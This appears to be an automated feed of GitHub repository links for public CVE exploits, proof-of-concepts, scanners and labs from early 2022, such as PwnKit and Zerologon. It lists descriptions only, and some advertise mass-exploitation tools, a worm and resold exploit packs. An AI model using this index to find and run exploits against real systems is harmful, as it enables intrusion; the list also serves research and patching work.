**Writeup(malay) ''Coming soon"** : [Blackyguy/CVE-2012-2661-ActiveRecord-SQL-injection](https://github.com/Blackyguy/CVE-2012-2661-ActiveRecord-SQL-injection) create time: 2022-02-23T09:15:42Z

**An exploit for CVE-2020-6418 implementing a SHELF Loader. Published as part of Tmp.0ut volume 2** : [ulexec/ChromeSHELFLoader](https://github.com/ulexec/ChromeSHELFLoader) create time: 2022-02-19T20:00:04Z

**Apache APISIX apisix/batch-requests RCE** : [Udyz/CVE-2022-24112](https://github.com/Udyz/CVE-2022-24112) create time: 2022-02-22T19:04:52Z

**CVE-2022** : [TheRealSlurpie/CVE-2022](https://github.com/TheRealSlurpie/CVE-2022) create time: 2022-02-22T16:04:27Z

**CVE-2022-24112:Apache APISIX apisix/batch-requests RCE** : [Mr-xn/CVE-2022-24112](https://github.com/Mr-xn/CVE-2022-24112) create time: 2022-02-22T14:09:49Z

**no description** : [UzJu/CVE-2022-21660](https://github.com/UzJu/CVE-2022-21660) create time: 2022-02-22T09:50:09Z

**no description** : [mxypoo/CVE-2016-3116-DropbearSSH](https://github.com/mxypoo/CVE-2016-3116-DropbearSSH) create time: 2022-02-22T06:59:55Z

**no description** : [mtthwstffrd/dirkjanm-CVE-2020-1472](https://github.com/mtthwstffrd/dirkjanm-CVE-2020-1472) create time: 2022-02-22T03:33:38Z

**no description** : [mtthwstffrd/SecuraBV-CVE-2020-1472](https://github.com/mtthwstffrd/SecuraBV-CVE-2020-1472) create time: 2022-02-22T03:33:24Z

**no description** : [mtthwstffrd/calebstewart-CVE-2021-1675](https://github.com/mtthwstffrd/calebstewart-CVE-2021-1675) create time: 2022-02-22T03:32:34Z

**no description** : [mtthwstffrd/cube0x0-CVE-2021-1675](https://github.com/mtthwstffrd/cube0x0-CVE-2021-1675) create time: 2022-02-22T03:32:14Z

**cve-2022-23131** : [L0ading-x/cve-2022-23131](https://github.com/L0ading-x/cve-2022-23131) create time: 2022-02-22T01:39:52Z

**CVE-2021-3560 Polkit v0.105-26 Linux Privilege Escalation PoC by Vivald0x6f** : [Nosferatuvjr/Vivald0x6f](https://github.com/Nosferatuvjr/Vivald0x6f) create time: 2022-02-21T21:39:29Z

**Changelog CVE-2021-33044,CVE-2021-33045 Identity authentication bypass vulnerability found in some Dahua products CVE-2021-27248,CVE-2021-27249,CVE-2021-27250,CVE-2021-34860,CVE-2021-34861,CVE-2021-34862,CVE-2021-34863 Multiple vulnerabilities in DAP-2020 H/W rev. Ax with F/W v1.01 and below HTTP Path Traversal CVE-2019-7406 RCE vulnerability in TP-Link Wi-Fi Extenders via a malformed user agent field in HTTP headers CVE-2020-2501,CVE-2021-28797 Stack Buffer Overflow in QNAP Surveillance Station CVE-2021-34730 Critical UPnP Service Flaw on Cisco Small Business RV Series Routers CVE-2020-35785 Multiple HTTP authentication vulnerabilities on DGN2200v1** : [Alonzozzz/alonzzzo](https://github.com/Alonzozzz/alonzzzo) create time: 2022-02-21T21:22:43Z

**A repository housing the exploit code for CVE-2021-27965, a stack-buffer overflow vulnerability in MsIo.sys.** : [Leo-Security/CVE-2021-27965-Win10-20H2-x64](https://github.com/Leo-Security/CVE-2021-27965-Win10-20H2-x64) create time: 2022-02-21T20:31:17Z

**no description** : [Tanmay-N/CVE-2021-4034](https://github.com/Tanmay-N/CVE-2021-4034) create time: 2022-02-21T16:54:38Z

**CVE-2022-21907 Mass Exploitation tool written in Python 3 compatible with lists of URL/IPs. For a large number of targets you can increase the number of threads, we don't recommend more than 1024. This tool is NOT free to prevent abuse and do not expect to find a fix-it-all proof of concept for exploitation for free. Only for those knowledgeable.** : [coconut20/CVE-2022-21907](https://github.com/coconut20/CVE-2022-21907) create time: 2022-02-21T16:28:39Z

**An easy to use Python package to exploit ICSA-17-124-01 / CVE-2017-7921 in HikVision camera's.** : [NFIRBV/krijg-de-hik](https://github.com/NFIRBV/krijg-de-hik) create time: 2022-02-21T13:38:55Z

**This is the repository used for CVE-2017-7651 for exploiting mosquitto 1.4.14** : [St3v3nsS/CVE-2017-7651](https://github.com/St3v3nsS/CVE-2017-7651) create time: 2022-02-21T12:54:41Z

**CVE-2022-24112 check** : [shakeman8/CVE-2022-24112](https://github.com/shakeman8/CVE-2022-24112) create time: 2022-02-21T11:52:28Z

**exiftool exploit** : [tuhin81/CVE-2021-22204-exiftool](https://github.com/tuhin81/CVE-2021-22204-exiftool) create time: 2022-02-21T11:07:19Z

**no description** : [AS4mir/CVE-2021-45008](https://github.com/AS4mir/CVE-2021-45008) create time: 2022-02-21T09:00:38Z

**poc** : [zwjjustdoit/cve-2022-23131](https://github.com/zwjjustdoit/cve-2022-23131) create time: 2022-02-21T02:42:23Z

**no description** : [0tt7/CVE-2022-23131](https://github.com/0tt7/CVE-2022-23131) create time: 2022-02-21T00:51:14Z

**CVE-2022-25375 - Demo exploit of RNDIS USB Gadget** : [szymonh/rndis-co](https://github.com/szymonh/rndis-co) create time: 2022-02-17T14:02:58Z

**Proof Of Concept for the 2021's pkexec vulnerability CVE-2021-4034** : [JoaoFukuda/CVE-2021-4034_POC](https://github.com/JoaoFukuda/CVE-2021-4034_POC) create time: 2022-02-20T17:49:21Z

**no description** : [BL0odz/CVE-2021-40449-NtGdiResetDC-UAF](https://github.com/BL0odz/CVE-2021-40449-NtGdiResetDC-UAF) create time: 2022-02-20T16:23:26Z

**CVE-2022-24086 about Magento RCE** : [Mr-xn/CVE-2022-24086](https://github.com/Mr-xn/CVE-2022-24086) create time: 2022-02-20T13:52:31Z

**no description** : [foxtrot/CVE-2021-1965](https://github.com/foxtrot/CVE-2021-1965) create time: 2022-02-20T00:52:01Z

**Fancy Zerologon Beta** : [Exploitspacks/CVE-2020-1472](https://github.com/Exploitspacks/CVE-2020-1472) create time: 2022-02-19T23:51:30Z

**PrintNightmare+Manual** : [Exploitspacks/CVE-2021-34527-CVE-2021-1675](https://github.com/Exploitspacks/CVE-2021-34527-CVE-2021-1675) create time: 2022-02-19T23:20:58Z

**Fully modified exploit for Ms17-010** : [Exploitspacks/MS17-010-2017-2997-CVE-2017-2998-CVE-2017-2999-CVE-2017-3000-CVE-2017-3001-CVE-2017-3002-CVE-2017-3](https://github.com/Exploitspacks/MS17-010-2017-2997-CVE-2017-2998-CVE-2017-2999-CVE-2017-3000-CVE-2017-3001-CVE-2017-3002-CVE-2017-3) create time: 2022-02-19T22:45:52Z

**Modified exploit** : [Exploitspacks/CVE-2019-0708](https://github.com/Exploitspacks/CVE-2019-0708) create time: 2022-02-19T22:39:05Z

**A full-fledged exploit for CVE-2018-13379-CVE-2020-12812-CVE-2019-5591 and not only with a powershell parser. Any evidence** : [Exploitspacks/CVE-2018-13379-CVE-2020-12812-CVE-2019-5591](https://github.com/Exploitspacks/CVE-2018-13379-CVE-2020-12812-CVE-2019-5591) create time: 2022-02-19T22:30:47Z

**Vulnerability: CVE-2020-0787 (Published: March 10, 2020) Supported versions: Vista/2008/W7/2008R2/W8/2012/W8.1/2012R2/W10/2016/2019 Supported architecture: x86/x64 Development stage: v1.0.20130 (stable) Code size: 36Kb** : [Exploitspacks/CVE-2020-0787](https://github.com/Exploitspacks/CVE-2020-0787) create time: 2022-02-19T22:18:00Z

**SonicWall Exploit CVE-2021-20028** : [Exploitspacks/CVE-2021-20028](https://github.com/Exploitspacks/CVE-2021-20028) create time: 2022-02-19T21:43:51Z

**no description** : [dhammon/HotelDruid-CVE-2021-42949](https://github.com/dhammon/HotelDruid-CVE-2021-42949) create time: 2022-02-19T21:02:42Z

**no description** : [dhammon/HotelDruid-CVE-2021-42948](https://github.com/dhammon/HotelDruid-CVE-2021-42948) create time: 2022-02-19T21:01:12Z

**Cross-Site Request Forgery** : [AS4mir/CVE-2021-45007](https://github.com/AS4mir/CVE-2021-45007) create time: 2022-02-19T15:28:59Z

**CVE-2021-1965 WiFi Zero Click RCE Trigger PoC** : [parsdefense/CVE-2021-1965](https://github.com/parsdefense/CVE-2021-1965) create time: 2022-02-18T14:19:58Z

**no description** : [1mxml/CVE-2022-23131](https://github.com/1mxml/CVE-2022-23131) create time: 2022-02-18T14:48:53Z

**no description** : [parsdefense/CVE-2021-1965](https://github.com/parsdefense/CVE-2021-1965) create time: 2022-02-18T11:54:48Z

**cve-2022-23131 zabbix-saml-bypass-exp** : [Mr-xn/cve-2022-23131](https://github.com/Mr-xn/cve-2022-23131) create time: 2022-02-18T11:51:47Z

**CVE-2021-4034 POC and Docker and simple Analysis write up** : [chenaotian/CVE-2022-0185](https://github.com/chenaotian/CVE-2022-0185) create time: 2022-02-18T09:27:34Z

**cve-2022-23131 exp** : [jweny/zabbix-saml-bypass-exp](https://github.com/jweny/zabbix-saml-bypass-exp) create time: 2022-02-18T08:38:53Z

**pkexec EoP exploit** : [LJP-TW/CVE-2021-4034](https://github.com/LJP-TW/CVE-2021-4034) create time: 2022-02-17T13:17:07Z

**no description** : [LeQuocKhanh2K/Tool_Exploit_Password_Camera_CVE-2018-9995](https://github.com/LeQuocKhanh2K/Tool_Exploit_Password_Camera_CVE-2018-9995) create time: 2022-02-18T03:17:31Z

**no description** : [qq1549176285/CVE-2022-23131](https://github.com/qq1549176285/CVE-2022-23131) create time: 2022-02-18T03:03:26Z

**no description** : [LeQuocKhanh2K/Tool_Camera_Exploit_Netwave_CVE-2018-6479](https://github.com/LeQuocKhanh2K/Tool_Camera_Exploit_Netwave_CVE-2018-6479) create time: 2022-02-18T02:33:04Z

**Skeleton (but pronounced like Peloton): A Zero-Click RCE exploit for CVE-2021-0326** : [aemmitt-ns/skeleton](https://github.com/aemmitt-ns/skeleton) create time: 2022-01-17T21:35:19Z

**Hotel Druid 3.0.3 Code Injection to Remote Code Execution** : [0z09e/CVE-2022-22909](https://github.com/0z09e/CVE-2022-22909) create time: 2022-02-17T17:18:02Z

**no description** : [RobertDra/CVE-2022-25257](https://github.com/RobertDra/CVE-2022-25257) create time: 2022-02-17T13:29:26Z

**no description** : [RobertDra/CVE-2022-25256](https://github.com/RobertDra/CVE-2022-25256) create time: 2022-02-17T13:11:08Z

**An exploit script of CVE-2016-5195** : [th3-5had0w/DirtyCOW-PoC](https://github.com/th3-5had0w/DirtyCOW-PoC) create time: 2022-02-17T11:57:08Z

**no description** : [tranmanhdat/couchdb_cve-2017-12635](https://github.com/tranmanhdat/couchdb_cve-2017-12635) create time: 2022-02-17T09:25:26Z

**no description** : [RobertDra/CVE-2022-25256](https://github.com/RobertDra/CVE-2022-25256) create time: 2022-02-17T10:14:05Z

**CVE-2022-25258 - Demo exploit targeting usb gadget's os descriptor handler** : [szymonh/d-os-descriptor](https://github.com/szymonh/d-os-descriptor) create time: 2022-02-15T09:04:25Z

**POC en Python para el CVE-2012-2982 mejorado del original por el usuario @OstojaOfficial** : [blu3ming/CVE-2012-2982](https://github.com/blu3ming/CVE-2012-2982) create time: 2022-02-16T20:00:36Z

**cve-2022-24086 patch for Magento 1.9** : [wambo-co/magento-1.9-cve-2022-24086](https://github.com/wambo-co/magento-1.9-cve-2022-24086) create time: 2022-02-16T08:50:33Z

**CVE-2018-15473** : [Goldenmonkeyy/SSHusernameEnum](https://github.com/Goldenmonkeyy/SSHusernameEnum) create time: 2022-02-16T05:27:00Z

**Rust implementation of the Log 4 Shell (log 4 j - CVE-2021-44228)** : [s-retlaw/l4srs](https://github.com/s-retlaw/l4srs) create time: 2022-02-16T01:13:08Z

**Local and Remote scan for shellshock vulnerability for Bash versions lower than 4.3.* [CVE-2014-6271].** : [0bfxgh0st-secondary/ShellShock](https://github.com/0bfxgh0st-secondary/ShellShock) create time: 2022-02-15T16:48:14Z

**no description** : [r1l4-i3pur1l4/CVE-2021-1732](https://github.com/r1l4-i3pur1l4/CVE-2021-1732) create time: 2022-02-15T16:55:31Z

**CVE-2021-22005 vcenter任意文件上传批量验证poc** : [chaosec2021/CVE-2021-22005poc](https://github.com/chaosec2021/CVE-2021-22005poc) create time: 2022-02-15T13:11:04Z

**NoPacScan is a CVE-2021-42287/CVE-2021-42278 Scanner,it scan for more domain controllers than other script** : [knightswd/NoPacScan](https://github.com/knightswd/NoPacScan) create time: 2022-01-07T11:59:55Z

**测试测试** : [MrShiF/CVE-2022-23888](https://github.com/MrShiF/CVE-2022-23888) create time: 2022-02-15T09:31:13Z

**SAP memory pipes(MPI) desynchronization vulnerability CVE-2022-22536.** : [antx-code/CVE-2022-22536](https://github.com/antx-code/CVE-2022-22536) create time: 2022-02-15T09:22:19Z

**ceshiceshi** : [MrShiF/CVE-2022-1](https://github.com/MrShiF/CVE-2022-1) create time: 2022-02-15T07:01:52Z

**测试测试** : [MrShiF/CVE-2022-1-15](https://github.com/MrShiF/CVE-2022-1-15) create time: 2022-02-15T06:32:33Z

**CVE-2021-4034 centos8可用版本** : [ck00004/CVE-2021-4034](https://github.com/ck00004/CVE-2021-4034) create time: 2022-02-15T02:34:48Z

**Build the struts-2.3.31 (CVE-2017-5638) environment** : [testpilot031/vulnerability_struts-2.3.31](https://github.com/testpilot031/vulnerability_struts-2.3.31) create time: 2022-02-15T00:38:47Z

**SQL Injection Vulnerability on PhpIPAM v1.4.4** : [dnr6419/CVE-2022-23046](https://github.com/dnr6419/CVE-2022-23046) create time: 2022-02-15T00:00:22Z

**All stages of exploring the polkit CVE-2021-4034 using codeql** : [hohn/codeql-sample-polkit](https://github.com/hohn/codeql-sample-polkit) create time: 2022-02-14T22:09:44Z

**no description** : [r1l4-i3pur1l4/CVE-2022-21882](https://github.com/r1l4-i3pur1l4/CVE-2022-21882) create time: 2022-02-14T21:28:15Z

**Adminer is an open-source database management in a single PHP file. In adminer from version 4.0.0 and before 4.7.9 there is a server-side request forgery vulnerability. Users of Adminer versions bundling all drivers (e.g. `adminer.php`) are affected. This is fixed in version 4.7.9.** : [llhala/CVE-2021-21311](https://github.com/llhala/CVE-2021-21311) create time: 2022-02-14T18:54:53Z

**Proof of Concept for EFSRPC Arbitrary File Upload (CVE-2021-43893)** : [jbaines-r7/blankspace](https://github.com/jbaines-r7/blankspace) create time: 2022-02-04T17:11:00Z

**Stored XSS Vulnerability on RosarioSIS 8.2.1** : [dnr6419/CVE-2021-45416](https://github.com/dnr6419/CVE-2021-45416) create time: 2022-02-14T07:31:01Z

**no description** : [rohankumardubey/CVE-2022-20699](https://github.com/rohankumardubey/CVE-2022-20699) create time: 2022-02-14T06:23:06Z

**CVE-2021-3156 deep dive.** : [ret2basic/sudoscience](https://github.com/ret2basic/sudoscience) create time: 2022-02-14T04:24:03Z

**no description** : [soffensive/CVE-2018-6574](https://github.com/soffensive/CVE-2018-6574) create time: 2022-02-13T18:05:33Z

**A tool to automate the exploit PWNKIT (CVE-2021-4034)** : [x04000/AutoPwnkit](https://github.com/x04000/AutoPwnkit) create time: 2022-02-13T14:51:47Z

**A simple PWNKIT file to convert you to root** : [x04000/CVE-2022-4034](https://github.com/x04000/CVE-2022-4034) create time: 2022-02-13T11:37:43Z

**f4T1H's PoC script for CVE-2021-3560 Polkit D-Bus Privilege Escalation** : [f4T1H21/CVE-2021-3560-Polkit-DBus](https://github.com/f4T1H21/CVE-2021-3560-Polkit-DBus) create time: 2022-02-13T10:12:51Z

**pwncat module that automatically exploits CVE-2021-4034 (pwnkit)** : [DanaEpp/pwncat_pwnkit](https://github.com/DanaEpp/pwncat_pwnkit) create time: 2022-02-13T00:05:32Z

**no description** : [purple-WL/Jenkins_CVE-2019-1003000](https://github.com/purple-WL/Jenkins_CVE-2019-1003000) create time: 2022-02-12T11:26:07Z

**Log4j vulnerability testing environment that based on CVE-2021-44228. This environment provide guidance to build the sample infrastructure and the exploit scripts** : [hotpotcookie/lol4j-white-box](https://github.com/hotpotcookie/lol4j-white-box) create time: 2022-02-12T11:19:41Z

**no description** : [purple-WL/wordpress-CVE-2022-21661](https://github.com/purple-WL/wordpress-CVE-2022-21661) create time: 2022-02-12T11:31:26Z

**CVE-2014-1767在win7_x64平台的EXP和分析文章** : [ExploitCN/CVE-2014-1767-EXP-PAPER](https://github.com/ExploitCN/CVE-2014-1767-EXP-PAPER) create time: 2022-02-12T08:57:19Z

**no description** : [an0n7os/CVE-2021-4034](https://github.com/an0n7os/CVE-2021-4034) create time: 2022-02-12T06:20:49Z

**This repository is for Log4j 2021 (CVE-2021-44228) Vulnerability demonstration and mitigation.** : [FeryaelJustice/Log4Shell](https://github.com/FeryaelJustice/Log4Shell) create time: 2022-02-12T03:02:24Z

**POC - CVE-2020-9484** : [ColdFusionX/CVE-2020-9484](https://github.com/ColdFusionX/CVE-2020-9484) create time: 2022-02-11T15:45:10Z

**This is a repo about some hacking scripts to make your hacks better and easier.Please do not use these for illegal purposes, It also includes a C (CVE-2021-4034)** : [mutur4/Hacking-Scripts](https://github.com/mutur4/Hacking-Scripts) create time: 2021-12-29T15:00:00Z

**no description** : [yuxiaokui/CVE-2022-xxxx](https://github.com/yuxiaokui/CVE-2022-xxxx) create time: 2022-02-11T08:12:40Z

**no description** : [gabe-k/CVE-2021-1883](https://github.com/gabe-k/CVE-2021-1883) create time: 2022-02-11T04:13:25Z

**pwnkit exploit** : [cspshivam/cve-2021-4043](https://github.com/cspshivam/cve-2021-4043) create time: 2022-02-11T04:06:21Z

**CVE-2021-38647 AKA "OMIGOD" vulnerability in Windows OMI** : [corelight/CVE-2021-38647](https://github.com/corelight/CVE-2021-38647) create time: 2021-09-15T04:51:02Z

**Exploit for command injection vulnerability found in uhttpd binary from TP-Link Tapo c200 IP camera** : [hacefresko/CVE-2021-4045-PoC](https://github.com/hacefresko/CVE-2021-4045-PoC) create time: 2021-11-15T14:48:14Z

**Proof of Concept for CVE-2021-1585: Cisco ASA Device Manager RCE** : [jbaines-r7/staystaystay](https://github.com/jbaines-r7/staystaystay) create time: 2022-02-10T21:52:24Z

**A Incorrect Use of a Privileged APIs vulnerability in PrintixService.exe, in Printix's "Printix Secure Cloud Print Management", Version 1.3.1035.0 and below allows Privilege Escalation to change values unrestricted in the Windows Registry via the UITasks.PersistentRegistryData parameter.** : [ComparedArray/printix-CVE-2022-Release-Carl](https://github.com/ComparedArray/printix-CVE-2022-Release-Carl) create time: 2022-02-10T19:12:43Z

**phpMyAdmin XSS** : [dipakpanchal456/CVE-2022-23808](https://github.com/dipakpanchal456/CVE-2022-23808) create time: 2022-02-01T17:02:03Z

**no description** : [puckiestyle/CVE-2022-20699](https://github.com/puckiestyle/CVE-2022-20699) create time: 2022-02-10T14:40:25Z

**CVE-2022-24348 Test** : [mochizuki875/helm-sample](https://github.com/mochizuki875/helm-sample) create time: 2022-02-10T09:55:41Z

**docker lab setup for kibana-7609** : [wolf1892/CVE-2019-7609](https://github.com/wolf1892/CVE-2019-7609) create time: 2022-02-10T06:22:54Z

**PoC script that shows RCE vulnerability over Intellian Satellite controller** : [Xh4H/Satellian-CVE-2020-7980](https://github.com/Xh4H/Satellian-CVE-2020-7980) create time: 2020-01-28T23:27:20Z

**no description** : [lukejenkins/CVE-2022-24693](https://github.com/lukejenkins/CVE-2022-24693) create time: 2022-02-09T18:28:00Z

**CVE-2020-5842 Stored XSS Vulnerability in Codoforum 4.8.3** : [prasanthc41m/codoforum](https://github.com/prasanthc41m/codoforum) create time: 2022-02-09T11:20:16Z

**A local PoC exploit for CVE-2019-2205** : [aemmitt-ns/pacpoc](https://github.com/aemmitt-ns/pacpoc) create time: 2022-02-09T02:08:50Z

**no description** : [modubyk/CVE_2020_0601](https://github.com/modubyk/CVE_2020_0601) create time: 2022-02-09T02:23:41Z

**Exploit for CVE-2022–22718 - Windows Print Spooler Elevation of Privilege Vulnerability (LPE)** : [ly4k/SpoolFool](https://github.com/ly4k/SpoolFool) create time: 2022-02-08T17:25:44Z

**no description** : [TheGetch/CVE-2022-23378](https://github.com/TheGetch/CVE-2022-23378) create time: 2022-01-14T23:54:36Z

**CVE-2012-1876 win7_x86和x64平台分析,EXP、POC代码和分析文档** : [ExploitCN/CVE-2012-1876-win7_x86_and_win7x64](https://github.com/ExploitCN/CVE-2012-1876-win7_x86_and_win7x64) create time: 2022-02-08T13:03:18Z

**local privilage esscalation vulnerablity** : [fireclasher/pwnkit-CVE-2021-4034-](https://github.com/fireclasher/pwnkit-CVE-2021-4034-) create time: 2022-02-08T03:55:23Z

**A golang based exp for CVE-2021-4034 dubbed pwnkit (more features added......)** : [FDlucifer/Pwnkit-go](https://github.com/FDlucifer/Pwnkit-go) create time: 2022-02-08T02:57:12Z

**Ansible role to patch RHSB-2022-001 Polkit Privilege Escalation - (CVE-2021-4034)** : [ziadsaleemi/polkit_CVE-2021-4034](https://github.com/ziadsaleemi/polkit_CVE-2021-4034) create time: 2022-02-08T00:09:31Z

**a demonstration PoC for CVE-2022-21877 (storage spaces controller memory leak)** : [Big5-sec/cve-2022-21877](https://github.com/Big5-sec/cve-2022-21877) create time: 2022-02-07T23:18:17Z

**Cisco Anyconnect VPN unauth RCE (rwx stack)** : [Audiobahn/CVE-2022-20699](https://github.com/Audiobahn/CVE-2022-20699) create time: 2022-02-07T15:53:21Z

**Worm written in python, abuses CVE-2020-7247** : [presentdaypresenttime/shai_hulud](https://github.com/presentdaypresenttime/shai_hulud) create time: 2022-02-07T10:59:36Z

**PoC for CVE-2021-4034.** : [pyhrr0/pwnkit](https://github.com/pyhrr0/pwnkit) create time: 2022-02-07T12:48:35Z

**no description** : [0x1ns4n3/CVE-2015-1328-Golden_Eye-](https://github.com/0x1ns4n3/CVE-2015-1328-Golden_Eye-) create time: 2022-02-07T10:52:51Z

**Wordpress Plugin Simple Job Board 2.9.3 LFI Vulnerability (CVE-2020-35749) proof of concept exploit** : [M4xSec/Wordpress-CVE-2020-35749](https://github.com/M4xSec/Wordpress-CVE-2020-35749) create time: 2022-02-06T14:52:22Z

**no description** : [nxiwmd/cve-2022-yuio](https://github.com/nxiwmd/cve-2022-yuio) create time: 2022-02-07T08:33:45Z

**no description** : [nxiwmd/CVE-2022-test333333](https://github.com/nxiwmd/CVE-2022-test333333) create time: 2022-02-07T08:20:50Z

**no description** : [nxiwmd/CVE-2022-rtest2](https://github.com/nxiwmd/CVE-2022-rtest2) create time: 2022-02-07T07:11:36Z

**lpe poc for cve-2022-21882** : [sailay1996/cve-2022-21882-poc](https://github.com/sailay1996/cve-2022-21882-poc) create time: 2022-02-07T03:45:36Z

**Polkit CVE-2021-4034 exploitation in High-Level Programming Language** : [Joffr3y/Polkit-CVE-2021-4034-HLP](https://github.com/Joffr3y/Polkit-CVE-2021-4034-HLP) create time: 2022-02-06T19:42:59Z

**no description** : [bughunt123/CVE-2020-5776](https://github.com/bughunt123/CVE-2020-5776) create time: 2022-02-06T16:03:02Z

**Find similar issues like CVE-2022-24348** : [jkroepke/CVE-2022-24348-2](https://github.com/jkroepke/CVE-2022-24348-2) create time: 2022-02-06T13:39:57Z

**no description** : [R0rt1z2/CVE-2017-0505-mtk](https://github.com/R0rt1z2/CVE-2017-0505-mtk) create time: 2022-02-04T22:43:21Z

**PoC for PwnKit: Local Privilege Escalation Vulnerability in polkit’s pkexec in Python** : [ravindubw/CVE-2021-4034](https://github.com/ravindubw/CVE-2021-4034) create time: 2022-02-04T18:31:15Z

**Script to get files from the server in a vulnerable Webmin Service. Simple and easy to use.** : [xen00rw/CVE-2006-3392](https://github.com/xen00rw/CVE-2006-3392) create time: 2021-02-09T19:13:59Z

**no description** : [Sergio235705/audit-xss-cve-2020-7934](https://github.com/Sergio235705/audit-xss-cve-2020-7934) create time: 2022-02-04T11:56:52Z

**👻 [PoC] CSV+ 0.8.0 - Arbitrary Code Execution (CVE-2022-21241)** : [satoki/csv-plus_vulnerability](https://github.com/satoki/csv-plus_vulnerability) create time: 2021-06-22T01:36:16Z

**DawnKit is Privilege Escalation USB-Rubber-Ducky payload, which exploits CVE-2021-4034 in less than 10sec's and spawns root shell for you.** : [drapl0n/dawnKit](https://github.com/drapl0n/dawnKit) create time: 2022-02-04T06:33:24Z

**no description** : [9lyph/CVE-2021-45901](https://github.com/9lyph/CVE-2021-45901) create time: 2021-09-01T05:35:59Z

**a python script that downloads neofetch and traitor and attempts to exploit CVE-2021-4034** : [Ph4nt0mh4x0r/auto-CVE-2021-4034](https://github.com/Ph4nt0mh4x0r/auto-CVE-2021-4034) create time: 2022-02-03T19:03:01Z

**Polkit vulnerability poc and automated mitigation** : [tahaafarooq/CVE-2021-4034](https://github.com/tahaafarooq/CVE-2021-4034) create time: 2022-02-03T18:22:54Z

**exploit for CVE-2021-43848** : [neex/hui2ochko](https://github.com/neex/hui2ochko) create time: 2022-02-03T16:31:13Z

**Apache HTTP Server 2.4.50 - RCE Lab** : [jas9reet/CVE-2021-42013-LAB](https://github.com/jas9reet/CVE-2021-42013-LAB) create time: 2022-02-03T13:26:05Z

**no description** : [L4ys/CVE-2022-21882](https://github.com/L4ys/CVE-2022-21882) create time: 2022-02-03T11:25:14Z

**no description** : [jessica0f0116/cve_2022_21882](https://github.com/jessica0f0116/cve_2022_21882) create time: 2022-02-03T07:17:28Z

**no description** : [Kayky-cmd/CVE-2019-6447--.](https://github.com/Kayky-cmd/CVE-2019-6447--.) create time: 2022-02-03T05:50:03Z

**PwnKit-Hunter is here to help you check if your systems are vulnerable to CVE-2021-4043, a.k.a. PwnKit** : [cyberark/PwnKit-Hunter](https://github.com/cyberark/PwnKit-Hunter) create time: 2022-01-30T13:42:16Z

**Polkit Instant Root Exploit** : [n3onhacks/CVE-2021-3560](https://github.com/n3onhacks/CVE-2021-3560) create time: 2022-02-02T17:08:24Z

**CVE-2021-2175** : [emad-almousa/CVE-2021-2175](https://github.com/emad-almousa/CVE-2021-2175) create time: 2022-02-02T16:53:35Z

**Test Sample** : [rezasarvani/CVE-2022-1234567](https://github.com/rezasarvani/CVE-2022-1234567) create time: 2022-02-02T15:13:00Z

**no description** : [Ankit-Ojha16/CVE-2021-4034](https://github.com/Ankit-Ojha16/CVE-2021-4034) create time: 2022-02-02T09:26:24Z

**PWNKIT - Local Privilege Escalation Vulnerability on Linux (Polkit)** : [HrishitJoshi/CVE-2021-4034](https://github.com/HrishitJoshi/CVE-2021-4034) create time: 2022-02-02T05:31:42Z

**Modified Moodle exploit for privilege escalation (Dorvack)** : [f0ns1/CVE-2020-14321-modified-exploit](https://github.com/f0ns1/CVE-2020-14321-modified-exploit) create time: 2022-02-01T18:29:11Z

**CVE-2022-21882** : [David-Honisch/CVE-2022-21882](https://github.com/David-Honisch/CVE-2022-21882) create time: 2022-02-01T17:58:29Z

**Stored Cross-Site Scripting - D-Link** : [g-rubert/CVE-2021-46108](https://github.com/g-rubert/CVE-2021-46108) create time: 2022-02-01T15:21:15Z

**no description** : [qkrtjsrbs315/CVE-2013-1763](https://github.com/qkrtjsrbs315/CVE-2013-1763) create time: 2022-02-01T13:38:51Z

**Pwnkit CVE-2021-4034** : [scent2d/PoC-CVE-2021-4034](https://github.com/scent2d/PoC-CVE-2021-4034) create time: 2022-02-01T12:11:19Z

**Study on Linux kernel code injection via CVE-2014-3153 (Towelroot)** : [c4mx/Linux-kernel-code-injection_CVE-2014-3153](https://github.com/c4mx/Linux-kernel-code-injection_CVE-2014-3153) create time: 2022-02-01T09:54:52Z

**PoC for CVE-2021-45897** : [manuelz120/CVE-2021-45897](https://github.com/manuelz120/CVE-2021-45897) create time: 2022-01-31T18:48:40Z

**POC Files for CVE-2019-17497** : [JM-Lemmi/cve-2019-17497](https://github.com/JM-Lemmi/cve-2019-17497) create time: 2022-01-31T12:03:13Z

**PortSwigger Burp Plugin for the Log4j (CVE-2021-44228)** : [y-security/yLog4j](https://github.com/y-security/yLog4j) create time: 2022-01-31T09:54:19Z

**CVE-2021-3560 analysis** : [chenaotian/CVE-2021-3560](https://github.com/chenaotian/CVE-2021-3560) create time: 2022-01-31T09:02:23Z

**CVE-2021-4034** : [xuntitled/Polkit-pkexec-exploit-for-Linux](https://github.com/xuntitled/Polkit-pkexec-exploit-for-Linux) create time: 2022-01-31T08:44:12Z

**no description** : [os909/iVANTI-CVE-2021-38560](https://github.com/os909/iVANTI-CVE-2021-38560) create time: 2022-01-31T08:21:05Z

**no description** : [kangpaidjo/CVE-2021-4034](https://github.com/kangpaidjo/CVE-2021-4034) create time: 2022-01-31T04:53:48Z

**no description** : [CyberSecurityUP/CVE-2019-5420-POC](https://github.com/CyberSecurityUP/CVE-2019-5420-POC) create time: 2022-01-30T19:42:52Z

**Go implementation of the PwnKit Linux Local Privilege Escalation exploit (CVE-2021-4034)** : [OXDBXKXO/go-PwnKit](https://github.com/OXDBXKXO/go-PwnKit) create time: 2022-01-29T20:24:43Z

**pwnkit: Local Privilege Escalation in polkit's pkexec (CVE-2021-4034)** : [Almorabea/pkexec-exploit](https://github.com/Almorabea/pkexec-exploit) create time: 2022-01-30T10:34:28Z

**no description** : [milot/dissecting-pkexec-cve-2021-4034](https://github.com/milot/dissecting-pkexec-cve-2021-4034) create time: 2022-01-29T21:20:14Z

**Exploit for CVE-2021-3156** : [litt1eb0yy/CVE-2021-3156](https://github.com/litt1eb0yy/CVE-2021-3156) create time: 2022-01-30T06:58:09Z

**A remote code execution vulnerability occurs in OpenTSDB through 2.4.0 via command injection in the yrange parameter.** : [glowbase/CVE-2020-35476](https://github.com/glowbase/CVE-2020-35476) create time: 2022-01-30T05:09:07Z

**PrintNightmare Local Privilege Escalation** : [AndrewTrube/CVE-2021-1675](https://github.com/AndrewTrube/CVE-2021-1675) create time: 2022-01-30T04:47:44Z

**PwnKit PoC for Polkit pkexec CVE-2021-4034** : [navisec/CVE-2021-4034-PwnKit](https://github.com/navisec/CVE-2021-4034-PwnKit) create time: 2022-01-30T03:08:51Z

**A complete PoC for CVE-2021-22204 exiftool RCE** : [0xBruno/CVE-2021-22204](https://github.com/0xBruno/CVE-2021-22204) create time: 2022-01-30T03:11:56Z

